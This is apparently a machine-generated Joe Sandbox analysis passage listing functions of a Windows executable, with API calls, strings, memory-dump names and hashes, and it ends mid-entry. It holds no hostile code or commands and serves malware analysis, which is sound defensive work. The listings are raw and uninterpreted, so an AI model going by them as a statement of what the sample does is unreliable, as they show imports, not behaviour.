APIs

LoadIconW.USER32(00000000,00007F03), ref: 001E3033

Strings

info, xrefs: 001E2FD4
warning, xrefs: 001E301C
stop, xrefs: 001E3004
question, xrefs: 001E2FEC
blank, xrefs: 001E2FB5

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: d329efa80aa72f2b5c2d5f95a8b2f5992809df1a67bd478fce44ab2ca05375e3
Instruction ID: e07b8bf6dacdcadc9993c9f15b6883a1c64580790d41b68421c4a7cc901e63eb
Opcode Fuzzy Hash: d329efa80aa72f2b5c2d5f95a8b2f5992809df1a67bd478fce44ab2ca05375e3
Instruction Fuzzy Hash: 2D113D35348BC6BED7249A19EC46C6F779CDF26320F10002AF910A71C2DB709F4055A1

Function 001E42F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 001E4312
LoadStringW.USER32(00000000), ref: 001E4319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 001E432F
LoadStringW.USER32(00000000), ref: 001E4336
_wprintf.LIBCMT ref: 001E435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 001E437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 001E4357

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 9001329cedc3b14189b6877136cb9f63c9473a953baa1008863e9bd022676c5b
Instruction ID: 64dcbe6736d115a491f6c7db61e672f30c0ab6edf5289cf758e66e2962c1dc24
Opcode Fuzzy Hash: 9001329cedc3b14189b6877136cb9f63c9473a953baa1008863e9bd022676c5b
Instruction Fuzzy Hash: 8F018FF2840308BFE760D7A4EE8DEEB736CEB08300F0000A1BB09E2452EA715E844B70

Function 0020D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623

GetSystemMetrics.USER32(0000000F), ref: 0020D47C
GetSystemMetrics.USER32(0000000F), ref: 0020D49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0020D6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0020D6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0020D716
ShowWindow.USER32(00000003,00000000), ref: 0020D735
InvalidateRect.USER32(?,00000000,00000001), ref: 0020D75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 0020D77D

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 92453dd3c5818e7e639fc57a61084b47d1198992afad6e0af804f68b8cd1d7ef
Instruction ID: 12f4eb5db303a7fc11d301e908edb8abd5f9c14a551bbe6de5b71e72ca3d98ec
Opcode Fuzzy Hash: 92453dd3c5818e7e639fc57a61084b47d1198992afad6e0af804f68b8cd1d7ef
Instruction Fuzzy Hash: 23B19B75601326EFDF14CFA8C9C97AD7BB1BF04701F088169EC489B6A6D771A9A0CB50

Function 00182A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,001BC1C7,00000004,00000000,00000000,00000000), ref: 00182ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,001BC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00182B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,001BC1C7,00000004,00000000,00000000,00000000), ref: 001BC21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,001BC1C7,00000004,00000000,00000000,00000000), ref: 001BC286

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 1873988357b34af51e326b5047a4e9a6a8fe51aaf6883af90de5f345a8ac1a34
Instruction ID: 22763a5692488a3f4c8c152ccd412a3bddc3fd17c0b7cb735976a2bc55b4addd
Opcode Fuzzy Hash: 1873988357b34af51e326b5047a4e9a6a8fe51aaf6883af90de5f345a8ac1a34
Instruction Fuzzy Hash: 75412934204780ABC73FAB28DD8CB6B7B96AF56300F15881DE09787D61CB319A81DF51

Function 001E70C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 001E70DD

Part of subcall function 001A0DB6: std::exception::exception.LIBCMT ref: 001A0DEC
Part of subcall function 001A0DB6: __CxxThrowException@8.LIBCMT ref: 001A0E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 001E7114
EnterCriticalSection.KERNEL32(?), ref: 001E7130
_memmove.LIBCMT ref: 001E717E
_memmove.LIBCMT ref: 001E719B
LeaveCriticalSection.KERNEL32(?), ref: 001E71AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 001E71BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 001E71DE

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 70e0ec52950427fef86ba11396fb4d99fc9e3e774db3823de6c2f5eaf06bae08
Instruction ID: 0df0127695275b3a888e03f7eb0b64d362837634cd076ddc0e7eab3e6e2f27ef
Opcode Fuzzy Hash: 70e0ec52950427fef86ba11396fb4d99fc9e3e774db3823de6c2f5eaf06bae08
Instruction Fuzzy Hash: 1D317036900205EFDF10EFA5ED899AEB778EF4A710F1441A5E904AB256DB709E10DB60

Function 002061D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 002061EB
GetDC.USER32(00000000), ref: 002061F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 002061FE
ReleaseDC.USER32(00000000,00000000), ref: 0020620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00206246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00206257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0020902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00206291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 002062B1

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 0ec729ea3678c657a2a7a30853bfc2aa8547058b50516bf871dc04009bdcd924
Instruction ID: b7824766bebfa525ac23d0beaa1973f8dac3cddef030dc61c6e8a7a83cbcfc1d
Opcode Fuzzy Hash: 0ec729ea3678c657a2a7a30853bfc2aa8547058b50516bf871dc04009bdcd924
Instruction Fuzzy Hash: 1C317F72151210BFEB218F50DD8AFEA3BADEF49765F044065FE089A292C6759C51CB70

Function 001DBBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 001DBBC4
_memcmp.LIBCMT ref: 001DBBE6
_memcmp.LIBCMT ref: 001DBBFE
_memcmp.LIBCMT ref: 001DBC11
_memcmp.LIBCMT ref: 001DBC2B
_memcmp.LIBCMT ref: 001DBC3E
_memcmp.LIBCMT ref: 001DBC56
_memcmp.LIBCMT ref: 001DBC71

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 104d3af002db8654b6e16ba0d798fbf0cf5273ee753d2a5e9951a2f2f3e664ab
Instruction ID: 7a3d88775ab16daac3e035700e20c7bf5f2bab2b3b4f37426274d9991e464e62
Opcode Fuzzy Hash: 104d3af002db8654b6e16ba0d798fbf0cf5273ee753d2a5e9951a2f2f3e664ab
Instruction Fuzzy Hash: 8021F261618205FBE60566299DC2FFB739CAF26348F064023FD0696343EB25DE34C2A1

Function 001EEB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00189837: __itow.LIBCMT ref: 00189862
Part of subcall function 00189837: __swprintf.LIBCMT ref: 001898AC

Part of subcall function 0019FC86: _wcscpy.LIBCMT ref: 0019FCA9

_wcstok.LIBCMT ref: 001EEC94
_wcscpy.LIBCMT ref: 001EED23
_memset.LIBCMT ref: 001EED56

Strings

X, xrefs: 001EED93

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 995170148f9d8c2d6f9a1c5a4d19b3c09526c275eaa93fdc99098bb220bc7f6b
Instruction ID: 53ca40c4e8e55f03c92e52357036f56a55450ee59c46b55390ef18c6d371e0aa
Opcode Fuzzy Hash: 995170148f9d8c2d6f9a1c5a4d19b3c09526c275eaa93fdc99098bb220bc7f6b
Instruction Fuzzy Hash: 23C179756087419FC724EF24C881A6EB7E4FF95314F14492DF8999B2A2DB30ED45CB82

Function 001F6B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 001F6C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 001F6C21
WSAGetLastError.WSOCK32(00000000), ref: 001F6C34
htons.WSOCK32(?,?,?,00000000,?), ref: 001F6CEA
inet_ntoa.WSOCK32(?), ref: 001F6CA7

Part of subcall function 001DA7E9: _strlen.LIBCMT ref: 001DA7F3
Part of subcall function 001DA7E9: _memmove.LIBCMT ref: 001DA815

_strlen.LIBCMT ref: 001F6D44
_memmove.LIBCMT ref: 001F6DAD

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 5f653c197be855f08141be57dc6165eaf3f2e8d0e36b862de1f4b9023d0edcde
Instruction ID: bc9eb42aa19558757f3bcd7b6850fb361302eeeab004c6eb7329af785539aaff
Opcode Fuzzy Hash: 5f653c197be855f08141be57dc6165eaf3f2e8d0e36b862de1f4b9023d0edcde
Instruction Fuzzy Hash: 0781DF71204304ABC714FF64DC86E7BB7A9AFA4714F544A18FA559B2D2DB70EE00CB52

Function 00181424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01fe46a132af2ac7ea5b71819b1ab15081e764bc7fc768a87eb64df9d613d391
Instruction ID: 4eeccc184332134dc3a08e31edc87dd41e1d2fc38319ace72611410639ae6579
Opcode Fuzzy Hash: 01fe46a132af2ac7ea5b71819b1ab15081e764bc7fc768a87eb64df9d613d391
Instruction Fuzzy Hash: 9E716C32900109FFDB14DF98CC89ABEBB79FF85310F248159F915AA251C774AA52CFA0

Function 0020B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(011352C8), ref: 0020B3EB
IsWindowEnabled.USER32(011352C8), ref: 0020B3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0020B4DB
SendMessageW.USER32(011352C8,000000B0,?,?), ref: 0020B512
IsDlgButtonChecked.USER32(?,?), ref: 0020B54F
GetWindowLongW.USER32(011352C8,000000EC), ref: 0020B571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0020B589

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 63444e489ec2a484af6c7600537992667b58469cadfb73df350da6b249248423
Instruction ID: 57eecaf7fd3160ac87cf1b220d8f7f90e04298a0771fda35a7dad3551598d459
Opcode Fuzzy Hash: 63444e489ec2a484af6c7600537992667b58469cadfb73df350da6b249248423
Instruction Fuzzy Hash: 9C719138610706AFDB369F54D8A4FBABBB9EF09300F144059FA55972E3C731AA60CB50

Function 001FF41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001FF448
_memset.LIBCMT ref: 001FF511
ShellExecuteExW.SHELL32(?), ref: 001FF556

Part of subcall function 00189837: __itow.LIBCMT ref: 00189862
Part of subcall function 00189837: __swprintf.LIBCMT ref: 001898AC

Part of subcall function 0019FC86: _wcscpy.LIBCMT ref: 0019FCA9

GetProcessId.KERNEL32(00000000), ref: 001FF5CD
CloseHandle.KERNEL32(00000000), ref: 001FF5FC

Strings

@, xrefs: 001FF525

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 48751afefafca330634abfafe6efe322b0aafb99b40e30903bd4ed1dc11f6743
Instruction ID: 49ee0270587786c19f19582fd912bf249ce49079478d14573526fc58ff541f7b
Opcode Fuzzy Hash: 48751afefafca330634abfafe6efe322b0aafb99b40e30903bd4ed1dc11f6743
Instruction Fuzzy Hash: 11619D75A006199FCB14EF64C4859AEBBF5FF49314F14806DE91AAB361CB70AE42CF90

Function 001E0F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 001E0F8C
GetKeyboardState.USER32(?), ref: 001E0FA1
SetKeyboardState.USER32(?), ref: 001E1002
PostMessageW.USER32(?,00000101,00000010,?), ref: 001E1030
PostMessageW.USER32(?,00000101,00000011,?), ref: 001E104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 001E1095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 001E10B8

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 791273abf0686e0cc7e534e65846c74d411db50f10b6cd318d4df1646564ad62
Instruction ID: ae12688da36637dd5cf68621db36eca76956cdcbb6bb895861da1760fd94c485
Opcode Fuzzy Hash: 791273abf0686e0cc7e534e65846c74d411db50f10b6cd318d4df1646564ad62
Instruction Fuzzy Hash: FE51D0B0604BD63AFB3642358C15BBEBEA96B06304F088589F1D5868C3C3E9ACD8D751

Function 001E0D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 001E0DA5
GetKeyboardState.USER32(?), ref: 001E0DBA
SetKeyboardState.USER32(?), ref: 001E0E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 001E0E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 001E0E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 001E0EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 001E0EC9

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: a4e04208fef3d422214bec7aa1fe4bced846b629bcdb3f2aa1cc069c36432f6b
Instruction ID: fb97b13b20a031183d1811ae680eac3dd457c79b5fac51875c45901e8ff911ac
Opcode Fuzzy Hash: a4e04208fef3d422214bec7aa1fe4bced846b629bcdb3f2aa1cc069c36432f6b
Instruction Fuzzy Hash: 7751E5A0544BD53EFB3783768C45B7EBFA96B0A300F088999E1D4568C2C3D5ACD8D760

Function 001E55FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 001E560A
_wcsncpy.LIBCMT ref: 001E563F
_wcsncpy.LIBCMT ref: 001E5671
_wcsncpy.LIBCMT ref: 001E56A4
_wcsncpy.LIBCMT ref: 001E56E6
_wcsncpy.LIBCMT ref: 001E5720
_wcsncpy.LIBCMT ref: 001E574F

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 89b0d81e61a4eee50412d937b1a72c328c3d5dddbbc8b942837490dbb72dde86
Instruction ID: bdced9c5b0783e2de2c44aae78e14c9622637a63deebbe35e50a467ca8d96c72
Opcode Fuzzy Hash: 89b0d81e61a4eee50412d937b1a72c328c3d5dddbbc8b942837490dbb72dde86
Instruction Fuzzy Hash: 1141C469C1065476CB11EBB88C86ACFB3B99F16310F508966F518E3221FB34E355C7AA

Function 001DD56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 001DD5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 001DD60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 001DD61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 001DD69D

Strings

,,!, xrefs: 001DD578
DllGetClassObject, xrefs: 001DD610

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: ,,!$DllGetClassObject
API String ID: 753597075-108149451
Opcode ID: d9948d237c5a16d71da3b0d3794e89efb189ef97b84ba0a21a8e6a38031ffada
Instruction ID: 7a2022fbdf5d81c6bb771b37eae70d1d4d1cea98e16f11473be3676f51c4ea11
Opcode Fuzzy Hash: d9948d237c5a16d71da3b0d3794e89efb189ef97b84ba0a21a8e6a38031ffada
Instruction Fuzzy Hash: F7417EB1600204EFDF15CF64E884A9ABBA9EF54314F1681AAED099F306D7B1D944CBE0

Function 001E3671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 001E466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001E3697,?), ref: 001E468B

Part of subcall function 001E466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001E3697,?), ref: 001E46A4

lstrcmpiW.KERNEL32(?,?), ref: 001E36B7
_wcscmp.LIBCMT ref: 001E36D3
MoveFileW.KERNEL32(?,?), ref: 001E36EB
_wcscat.LIBCMT ref: 001E3733
SHFileOperationW.SHELL32(?), ref: 001E379F

Strings

\*.*, xrefs: 001E372D

Memory Dump Source

